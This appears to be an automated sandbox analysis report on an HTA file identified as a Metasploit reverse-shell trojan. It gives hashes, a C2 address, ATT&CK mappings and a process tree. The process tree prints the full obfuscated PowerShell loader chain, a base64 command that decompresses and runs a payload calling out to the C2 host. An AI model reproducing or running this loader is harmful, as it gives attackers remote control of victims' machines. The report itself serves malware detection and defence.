metasploit | 5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e

General

Target

5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e.hta
Size

7KB
MD5

568178389480e9f8368e66d811b105fe
SHA1

34c19d4b6bc99440b30ee9922a566ded9bd7a287
SHA256

5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e
SHA512

7bf3b91350ad635543cb92167d3e0b28d7d51164b8da040ea0740e672bfdad7d4242b25ba42b12a1c4cd266cbf44fa1ae6b8c34b01eea61ffa3687e8fd06e9ed
SSDEEP

192:gn2jh1hqT2TsQL36ANDaqkvhYXMl9tKTsQGF6hd9d:gn2jh1hszMLBa5vhB94Tl1hd9d

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

C2

144.76.219.54:8000

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

2 2624 powershell.exe
2 2624 powershell.exe
2 2624 powershell.exe
2 2624 powershell.exe
2 2624 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2604 powershell.exe
2624 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2604 powershell.exe
2624 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2604 powershell.exe
Token: SeDebugPrivilege 2624 powershell.exe

flow	pid	process
2	2624	powershell.exe
2	2624	powershell.exe
2	2624	powershell.exe
2	2624	powershell.exe
2	2624	powershell.exe

pid	process
2604	powershell.exe
2624	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2604	powershell.exe
2624	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 2020 wrote to memory of 2604	2020	mshta.exe	powershell.exe
PID 2020 wrote to memory of 2604	2020	mshta.exe	powershell.exe
PID 2020 wrote to memory of 2604	2020	mshta.exe	powershell.exe
PID 2020 wrote to memory of 2604	2020	mshta.exe	powershell.exe
PID 2604 wrote to memory of 2624	2604	powershell.exe	powershell.exe
PID 2604 wrote to memory of 2624	2604	powershell.exe	powershell.exe
PID 2604 wrote to memory of 2624	2604	powershell.exe	powershell.exe
PID 2604 wrote to memory of 2624	2604	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQwBpAHYAZwBtAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHcAYQBvAHMAMgBaAFkASQBiACsARwBhAEoAbABLAGwAcwAzAGsASgBKAHAAaABBAEgARQB5AEEAbwB0AE4AaQByADgAMwBDADIAawB2AHQAZABYAGoAcAA5AGIALwBmAEwATgBnAGgAdgBTAFIAMwB2AFoATwA2AEUAcwBLAGUAbgBaAG0AZABmAGUAYQBaAEcAZgB0AHAANQBIAEwAQwBJAGkAawBjAGQANgBSAHYANwA5ADkASgAyAGUAcQBqAEcASQBXAFMASwBzAGUAVABmAHQAYwB2AFMASABMAHEATgBiAFQAVAByAHMAeAA2ADAAbQBkAEoAbgBlAHIAcgBkAFkATwBGAGkARQBTAHoAcQA2AHQANgBHAHMAYwA0ADQAcwBmADMAJwAnACsAJwAnADQAagBYAG0AZQBwAEwAZwBjAEUANABKAFQAbABSAE4AKwBsAE0AYQBMAFgAQwBNAHoAMgA3AG4AUwArAHgAeQA2AFoAcwBrAC8AMQBHADgAcABtAHkATwBhAEsAYQAyAHEAeQBOADMAZwBhAFUAegB7ADAAfQBmAEwARQBYAHAAZQA1AFMATQBSAFYAdABOAGUAJwAnACsAJwAnAFUAYwBGAFgANQA4AGsAWABSAHAAbQBlAFYAVwBiAEgANQBOAFUAVQAwAFUAUgBWADcAbAAzAEEAYwBGAGoAMQBLAEYAVQAzADYAcgBvAGsARAA3ADMAZAByAHIAQwBvAFcAYwBXAE8AVwBNAEoAOABYAFIAeQAnACcAKwAnACcAUQA2AHIAeABhAEgAVQBZAEoAOAAzAEEATgB2AGoAOQBqAEMAZgBNAEcAOABSAEkARwByAG4AQwA0AFQAWQA1ADcARwBrAGIAaQBUAGMASABKAFUAVQBSAFYANAA3AE0AZgBNADEAVAAwAHYAeABrAG0AaQBGAEsAUwBwAGMARAArAGQAegBYADUAWABwADkAbgBaAGQAMgBuAEUAUwBZAGkATABaAHMAUgB4AHoATgBZADIAagBoACsASgBpADUATgBpAEcAMABVAGUAeABYAGYAWQBuADQARwBWAHoAVwBNAFMAQgBUAE4ATgBBADcAVgBIAHQAcwBLAHEAJwAnACsAJwAnAEgASwBXAFUARgBxAFQALwA0AGsAYgB0ADQAVQAyAE8AMwBNADgAYQBxAGMAKwBOAFEASwB2AHsAMAB9AFkANgAwAEEAQwBYADEAeABTADQAdAA1AEsAYwBWAEgATwArAFcAVgBNAEkAOABVADAARwBCAGwATgBBAEQAdwB2AGcAdgA4AC8ASgB3ADYATABKAHkALwBRAHAAMgBUAEkARgAvAFQAdwB3ADYARwBnAE4AVQArAFMAOABqAEIAOQByAE4AVQBMAGsAZwBXAEgASQA0ADQAaQAzAGYAdwBLAHQALwBIAEsAZABaAG0AVAAzAEIATABjAG4ASwB7ADAAfQBDAGoALwByAHIASgBKAGIAZwBsADIANABCAE0ASABVAFkAYwBTAGIAbgBjAHgALwB5AEwAdwBjAEoAYwB7ADEAfQBvAEwANwBUAGUASgBuAEkARAArAHkAVABDAGoAVgAyAEUAUQB7ADEAfQBMAG0AWABGAFYAZgB5AHcAagAyAEsAVAA0AEEAVQBzAHoAVgBlAGgAQwBnAHEAbQBRAGIAMgBHAHQAZwBpAGcAewAwAH0ARQBCAGMAcQBDAEcAQwAvAE0AbQBpAEgAaABUADcAWgBHAFMAcQBpAEgAWQA5ADIARgByAEMAWQBRACcAJwArACcAJwBGAFMAUgBjACsAegBHAFkAWQArAEoAVQB4AFkAdwBzAEgAQQBKADQAeAAzAGQAZwBxAHsAMQB9AHgARABoAGUAQgBjAE8AJwAnACsAJwAnADYAewAxAH0ASwBYAFgANgA2AGUAQQBjAGwAcABVADUAUgBrAGgAUwBrAGYAZwBvAGwANgBoAFkAawBHAHkATwBLAHYAWQBLACcAJwArACcAJwBrAFIAdwBuAEoAdAB2AFMAVQBzADgATwBqAGMAZwByAFgAUwBpAGsAbgBMAGsAcAA0ADcAbQA2AG0ALwBSADMAewAwAH0ANwBOAHcANgBpAHgASQBlAHAAeQA3AGsARgBUAEMANAB0ADkAZgBZAEoAWQBnAEsAUwBBAHAAUwBtADMAagBZADIATgBrAGsAeQBNADkAWABYAGcAVwBrAGoAaQBpAEYAJwAnACsAJwAnADQAZwBGAHsAMAB9AGoANQBBAFEAawBBAGcAZwBiAEMANwBZAEUAawBPAG8AZwBoAGwAYQAwAGMAYgBjAEQATgBjAFUAaAA2AEIAeQBhAEIAawB0AGkAZwBKAG8ARQBGAG0ARgBIAE4AaQBGAEEAewAxAH0AdwBwAGIAdwBXAGEAMQAnACcAKwAnACcAOABLAFIAKwBBAEsAYQBIAEoATgBuAFkAVQBLACsAYgBjAHAANABRAFgASgBJAHoASwBFAEQAQwBaAGoARAA1AGYAKwBKADQAVwBYAGoATwBRAFoAVABqADMARwBXAEgAVABXAHYAcwBLAG0AeAA0ADYASQBHAFoATwBJAEsAawBtAFkAQQBIAGUAQwBJAE8AVQBEAFIAaQBsAGwAbwBvAEEAUgAvAHIAQgAyADcAagB7ADAAfQBxAGgAZABFAHYAcQBPAHEAeQB4AEcAVgBIAEwATgBWAGEAawBvAG0AOQBJAHgAYgBUAGcATgB5AFQAbgBKAG0AdABjAGUARABlAGQAWgBiAHMAVQAnACcAKwAnACcATgA3AFkATABYAHoAYwBUADAAMgByADMARwA0AE4AMgB7ADEAfQAvAGIAWQBzAFoAMABhAHQANQBzAG0AdgArAG0AYgAzAEcAbwArAEwASgBlADIAMwAnACcAKwAnACcAcgA0AGIAagB2AG4ARQAnACcAKwAnACcAMQBOAHYAMwBwAEwAdwBhADEALwBiAHIARAB0AG4AYgBYAGQAMABiAGIAMABzAGYAOQA4AFoAKwBVAHoAYQAyACsAMgBYAGcAKwBlAE8ARwA3AHcAYwBYAHYAbgAxAFgAKwBhADEARgB7ADEAfQBxAHsAMAB9ADYAdwBDAGgAWABVAGIAZgBSAFQATABzAGoAWQAnACcAKwAnACcAMgBPAFUAYQAnACcAKwAnACcAMABtAFQAYgBOAG8ARABNAGgAeQBzAE8AaQAwACsASAB6AHMAVQBEAGYAMQBTADgARgBDADUAUgBHAFQAYgBqAFoAZABPAGgAVgBsADcAVQA5AGUAdgBGACsAZgB7ADEAfQB2AHsAMQB9AE0ANwAxAHcAdgBMACcAJwArACcAJwAyADQAMwBiAHAAYwB0AFIAYgBhAFUAMwBkAGIAMABlAE4AWgAyAFcAdwBXADcARwBSAHEAegAzAFMAOAA2AHcAWgBRAHkARwBUAFcATQB3AEEATgBuAEgAbwBPAFQAWABRAEUAYQByAHIASQBVADYAaABsAFgAZABUADUAZwBlADYAewAwAH0ANwBBAGoARQBLADAATQBFAFoATwBsAFUAegBXAEQAMwBjAEwAOABOAFcAQwBFAEsAeABTAHsAMQB9AFcAWgA2AGUATQBzACsAZABVAGYARQBlAFMAdwA1ADYATAByAEgASgAzAHEAOQBVADYAdAA0AEQAOAA2ACsAWABVAFcATAB6AHMAUgBKAHsAMQB9ADUAZQBUAHgARwB0ADIAJwAnACsAJwAnAEcAaAB0AEQASAAxAGUAYQBIAGEATgB4AHIAVABmAHYAaABzAHsAMAB9AFcAWgBPAFMAcwBKAHEATgA3AE8AaABrAE4ASwB4AE8ARwAzAFUAMQBwAEEAVAA0AEkATgBtADYAZAAxAGIAeABrAFgAUQBmAG0AWQBsAHMASgA0AEsAeQBMAGcALwArAFEAaABIAFIAZQA5AFUAcQBYAHcAMAA5AEcAdABMAGsASgArAG8AKwBCAE4AeABoAGQAMwBHADEANwB7ADEAfQAzAG0AVgA2AGMATgBTAHkAJwAnACsAJwAnAGYAawBBAHEAWgA0AE8AUwBjAFQAewAwAH0AcQB6AE0ANQB0AFMAcQArAGEASQBqAHYAMwA4AG4AegBoADMAMwB2AFcAYwByAGYANgB2AFkAVwBpAHAATQBGAG8AawBBAEYAYQBPAFIANQBSAGIAWgBZADMATQBwAGEAYwA1ADgAUgBZAGEARwBxAFkAcgBxAHYAYwBCAHgAaABDACcAJwArACcAJwBoAE0AUgBaAG0AWgBPAFkANQAxAFMANQBvAHEANQBJAEgAbwA0AGoASwBUAGoAbwBCAEIAegBhADIAZwBlAGcAbgByAHQAUwBaAE8AZQBGAEwAWABUAHcATQBoAEYAVgAxAGMAVABpAEIARQBxAGcANwBqAEYATABvADQAQwB2AGkAaQBVAHQAKwBmAGwATQB2AFQANQA4AHIAWgBjAE8AMQBUAEEAegA5ACsAcgB6AHQAWQA3AFYAUgBiAEYAQwB7ADAAfQBZAEgAVwBJADYAZQA2AGMARQB6AE8AQwBPACcAJwArACcAJwArAHAASwBxAC8ASABDAGYANABGAE8ARABRAGwATgA1AEUANgBpADMAUQA0AE8AUQBWAHQAQgBEAG8AYQBjAGYAQwBGAHQAQQBaAGoATgBIAG4AdwBHAFcAMwBlAHEATABCAEMAVABjAEEAcgBBAEwAWABuAG8AcAB2AGcAQQBNADcAdwB7ADAAfQA0AE0AZgA1AFYAawBMAG0AYgBrADgANQBrAHIAcAB5ADEAagAvAGsAcwBKAGsANwBXAG4AQgBmAHgANQAvADAASwBZAGsAKwB3AGYAZABuACsASwBSAE8AWABDAEUAWgB3AFgANABoADgARgB6AHoAcgA3AHIAdwBOAGcAaABBAGcASABSAFIAdgA2AEwATQBYAEgAMABmADgAcQBEAGwAbQBOAHsAMAB9AE0AewAxAH0AdgB5AEEAMwBVAGcASgA4AHQAOABUAEYAOABtAC8ASwB6AEgAbgB4AGcASABSAHIAOQBYADAASABoAFMATQB7ADEAfQBFAEMAdwBBAEEAJwAnACkALQBmACcAJwBQACcAJwAsACcAJwB1ACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIACivgmUCA7VWbW/aSBD+Xqn/waos2ZYIb+GaJlKls3kJJphAHEyAotNir83C2kvtdXjp9b/fLNghvSR3vZO6EsKenZmdfeaZGftp5HLCIikcd6Rv799J2eqjGIWSKseTftcvSHLqNbTTrsx60mdJnerrdYOFiESzq6t6Gsc44sf3'+'4jXmepLgcE4JTlRN+lMaLXCMz27nS+xy6Zsk/1G8pmyOaKa2qyN3gaUz{0}fLEXpe5SMRVtNe'+'UcFX58kXRpmeVWbH5NUU0URV7l3AcFj1KFU36rokD73drrCoWcWOWMJ8XRy'+'Q6rxaHUYJ83ANvj9jCfMG8RIGrnC4TY57GkbiTcHJUURV47MfM1T0vxkmiFKSpcD+dzX5Xp9nZd2nESYiLZsRxzNY2jh+Ji5NiG0UexXfYn4GVzWMSBTNNA7VHtsKq'+'HKWUFqT/4kbt4U2O3M8aqc+NQKv{0}Y60ACX1xS4t5KcVHO+WVMI8U0GBlNADwvgv8/Jw6LJy/Qp2TIF/Tww6GgNU+S8jB9rNULkgWHI44i3fwKt/HKdZmT3BLcnK{0}Cj/rrJJbgl24BMHUYcSbncx/yLwcJc{1}oL7TeJnID+yTCjV2EQ{1}LmXFVfywj2KT4AUszVehCgqmQb2Gtgig{0}EBcqCGC/MmiHhT7ZGSqiHY92FrCYQ'+'FSRc+zGYY+JUxYwsHAJ4x3dgq{1}xDheBcO'+'6{1}KXX66eAclpU5RkhSkfgol6hYkGyOKvYK'+'kRwnJtvSUs8OjcgrXSiknLkp47m6m/R3{0}7Nw6ixIepy7kFTC4t9fYJYgKSApSm3jY2NkkyM9XXgWkjiiF'+'4gF{0}j5AQkAggbC7YEkOoghla0cbcDNcUh6ByaBktigJoEFmFHNiFA{1}wpbwWa1'+'8KR+AKaHJNnYUK+bcp4QXJIzKEDCZjD5f+J4WXjOQZTj3GWHTWvsKmx46IGZOIKkmYAHeCIOUDRillooAR/rB27j{0}qhdEvqOqyxGVHLNVakom9IxbTgNyTnJmtceDedZbsU'+'N7YLXzcT02r3G4N2{1}/bYsZ0at5smv+mb3Go+LJe23'+'r4bjvnE'+'1Nv3pLwa1/brDtnbXd0bb0sf98Z+Uza2+2Xg+eOG7wcXvn1X+a1F{1}q{0}6wChXUbfRTLsjY'+'2OUa'+'0mTbNoDMhysOi0+HzsUDf1S8FC5RGTbjZdOhVl7U9evF+f{1}v{1}M71wvL'+'243bpctRbaU3db0eNZ2WwW7GRqz3S86wZQyGTWMwANnHoOTXQEarrIU6hlXdT5ge6{0}7AjEK0MEZOlUzWD3cL8NWCEKxS{1}WZ6eMs+dUfEeSw56LrHJ3q9U6t4D86+XUWLzsRJ{1}5eTxGt2'+'GhtDH1eaHaNxrTfvhs{0}WZOSsJqN7OhkNKxOG3U1pAT4INm6d1bxkXQfmYlsJ4KyLg/+QhHRe9UqXw09GtLkJ+o+BNxhd3G17{1}3mV6cNSy'+'fkAqZ4OScT{0}qzM5tSq+aIjv38nzh33vWcrf6vYWipMFokAFaOR5RbZY3Mpac58RYaGqYrqvcBxhC'+'hMRZmZOY51S5oq5IHo4jKTjoBBza2gegnrtSZOeFLXTwMhFV1cTiBEqg7jFLo4CviiUt+flMvT58rZcO1TAz9+rztY7VRbFC{0}YHWI6e6cEzOCO'+'+pKq/HCf4FODQlN5E6i3Q4OQVtBDoacfCFtAZjNHnwGW3eqLBCTcArALXnopvgAM7w{0}4Mf5VkLmbk85krpy1j/ksJk7WnBfx5/0KYk+wfdn+KROXCEZwX4h8Fzzr7rwNghAgHRRv6LMXH0f8qDlmN{0}M{1}vyA3UgJ8t8TF8m/KzHnxgHRr9X0HhSM{1}ECwAA')-f'P','u')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a75a0165e6949377ead87ca1fa2af76c

SHA1
a47b3ae522692b6dd8b36bb61fb28c562f918668

SHA256
c9df20216a31981fbd294720d7f14bdddc9714ec7e03070cff44c76781e801ae

SHA512
62f66f16faf62e244391d0fc36e8a1fbfe7835895815130f3195cb6028d15f0a8af2b4d347562ce2ad74279075ac7d76362be1a5d4fb5bf5cc5385d2623f7729

Download Submit
memory/2624-7-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing